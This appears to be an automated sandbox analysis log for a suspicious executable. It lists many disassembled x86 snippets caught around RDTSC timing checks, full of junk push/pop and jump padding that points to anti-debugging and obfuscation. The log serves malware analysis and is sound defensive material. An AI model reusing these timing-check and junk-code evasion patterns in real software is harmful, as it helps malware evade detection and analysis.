Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28141 second address: A2814C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2814C second address: A28152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A282BB second address: A282D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC1350240CFh 0x00000009 popad 0x0000000a pushad 0x0000000b jc 00007FC1350240CCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2859E second address: A285A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28739 second address: A28754 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28754 second address: A2876C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC134D1C053h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2876C second address: A28775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28775 second address: A28779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28779 second address: A2877D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A288D7 second address: A288DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A288DB second address: A288ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCD7D second address: 9DCD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCD81 second address: 9DCD9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCD9F second address: 9DCDA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCDA3 second address: 9DCDC6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FC1350240E5h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC1350240D3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCDC6 second address: 9DCDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCE82 second address: 9DCEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FC1350240D5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC1350240CDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCEAF second address: 9DCEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28A76 second address: A28A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28A7A second address: A28A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a js 00007FC134D1C046h 0x00000010 jmp 00007FC134D1C04Ah 0x00000015 pop eax 0x00000016 jnl 00007FC134D1C04Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28A9F second address: A28AAB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC1350240CEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A28AAB second address: A28AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D740 second address: A2D744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D744 second address: A2D77C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC134D1C055h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007FC134D1C053h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2D464 second address: A2D46A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30B38 second address: A30B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30B53 second address: A30B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jo 00007FC1350240C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30F79 second address: A30F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007FC134D1C046h 0x0000000c popad 0x0000000d jmp 00007FC134D1C04Dh 0x00000012 pushad 0x00000013 js 00007FC134D1C04Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A310FA second address: A3110A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 je 00007FC1350240C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3110A second address: A3111F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FC134D1C046h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37756 second address: A3775A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3775A second address: A37760 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37760 second address: A3778A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC1350240C6h 0x0000000d je 00007FC1350240C6h 0x00000013 jne 00007FC1350240C6h 0x00000019 popad 0x0000001a push ecx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jo 00007FC1350240C6h 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 popad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3778A second address: A37798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC134D1C046h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38403 second address: A3840C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A386AE second address: A386B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A386B2 second address: A386BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38C74 second address: A38C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC134D1C046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38F7E second address: A38FD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jp 00007FC1350240C6h 0x00000018 popad 0x00000019 push ecx 0x0000001a jmp 00007FC1350240CAh 0x0000001f jmp 00007FC1350240D9h 0x00000024 pop ecx 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jbe 00007FC1350240CEh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38FD3 second address: A38FEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Eh 0x00000007 jg 00007FC134D1C052h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38FEB second address: A38FF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3929C second address: A392A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41908 second address: A4190C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4190C second address: A41917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4103E second address: A41042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41042 second address: A41046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A411E2 second address: A41200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC1350240D3h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41340 second address: A41393 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FC134D1C04Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC134D1C050h 0x00000013 pop ebx 0x00000014 jmp 00007FC134D1C054h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FC134D1C050h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push ebx 0x00000026 push edx 0x00000027 pop edx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41393 second address: A41398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A41398 second address: A413AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jne 00007FC134D1C046h 0x0000000e popad 0x0000000f jbe 00007FC134D1C05Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4A84E second address: A4A870 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FC1350240D5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48A21 second address: A48A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48E9A second address: A48EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48EA1 second address: A48EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48EA9 second address: A48EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC1350240CDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FDF second address: A48FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FE4 second address: A48FE9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FE9 second address: A48FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FC134D1C046h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48FF6 second address: A48FFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4915F second address: A49169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49169 second address: A491A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC1350240C6h 0x0000000a pop ebx 0x0000000b jmp 00007FC1350240D3h 0x00000010 jmp 00007FC1350240D4h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491A1 second address: A491C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 jns 00007FC134D1C059h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A491C1 second address: A491F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC1350240CCh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC1350240D7h 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A49478 second address: A4947D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A48667 second address: A4866B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A501D8 second address: A501DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A501DD second address: A501F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C581 second address: A5C585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F150 second address: A5F156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F156 second address: A5F15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5F15A second address: A5F185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b ja 00007FC1350240C6h 0x00000011 jc 00007FC1350240C6h 0x00000017 jmp 00007FC1350240D3h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60E5A second address: A60E8E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop esi 0x00000006 jg 00007FC134D1C05Ch 0x0000000c jmp 00007FC134D1C054h 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 pushad 0x00000017 jno 00007FC134D1C046h 0x0000001d jng 00007FC134D1C046h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A60E8E second address: A60E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jns 00007FC1350240C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6502D second address: A6504F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC134D1C046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC134D1C055h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A668D6 second address: A668E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FC1350240C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C1C4 second address: A6C1CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C1CC second address: A6C1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C1DB second address: A6C1EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FC134D1C046h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6C1EB second address: A6C1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8067F second address: 4D80687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80687 second address: 4D8068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8068D second address: 4D80691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80691 second address: 4D806BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+60h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, di 0x00000011 jmp 00007FC134D1C057h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806BA second address: 4D806C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806C0 second address: 4D806EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+24h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC134D1C055h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806EB second address: 4D806F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806F0 second address: 4D80722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 01E0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e jmp 00007FC134D1C04Fh 0x00000013 mov dword ptr [esi+28h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007FC134D1C04Bh 0x0000001e pop ecx 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80722 second address: 4D807EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC1350240D0h 0x00000009 jmp 00007FC1350240D5h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [ebx+68h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FC1350240D3h 0x0000001c xor cl, 0000007Eh 0x0000001f jmp 00007FC1350240D9h 0x00000024 popfd 0x00000025 mov ah, 61h 0x00000027 popad 0x00000028 mov dword ptr [esi+2Ch], eax 0x0000002b pushad 0x0000002c call 00007FC1350240D9h 0x00000031 mov cx, 4FA7h 0x00000035 pop esi 0x00000036 pushfd 0x00000037 jmp 00007FC1350240CDh 0x0000003c xor cx, AF16h 0x00000041 jmp 00007FC1350240D1h 0x00000046 popfd 0x00000047 popad 0x00000048 mov ax, word ptr [ebx+6Ch] 0x0000004c jmp 00007FC1350240CEh 0x00000051 mov word ptr [esi+30h], ax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov ebx, 6A089950h 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807EF second address: 4D807F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807F4 second address: 4D80840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007FC1350240D0h 0x00000015 mov word ptr [esi+32h], ax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC1350240D7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80840 second address: 4D80846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80846 second address: 4D8084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
